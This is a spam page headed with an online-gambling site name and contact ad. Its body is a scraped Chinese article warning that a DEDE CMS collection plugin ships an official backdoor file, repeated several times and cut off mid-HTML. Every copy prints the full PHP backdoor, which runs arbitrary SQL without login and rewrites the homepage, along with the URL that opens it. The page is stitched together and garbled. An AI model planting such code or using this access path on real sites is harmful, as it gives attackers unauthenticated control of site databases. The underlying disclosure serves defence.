喜来登线上娱乐备用网址-厦门卷2019市质检

首页

AD联系:507867812

喜来登线上娱乐备用网址

时间:2019-11-22 00:34:52 作者:优发娱乐手机版下载备用 浏览量:18072

喜来登线上娱乐备用网址去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>DEDE采集大师官方留后门的删除办法去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>DEDE采集大师官方留后门的删除办法DEDE采集大师官方留后门的删除办法DEDE采集大师官方留后门的删除办法,见下图

去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>

去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> 